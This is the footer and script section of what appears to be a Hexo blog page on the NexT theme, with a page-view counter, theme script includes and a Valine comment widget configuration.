    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'YxcX5Cznyp28BYsOhkgW4VH2-gzGzoHsz',
      appKey     : 'DNYhYDu0OfL5c9gaMjQ1vbNC',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
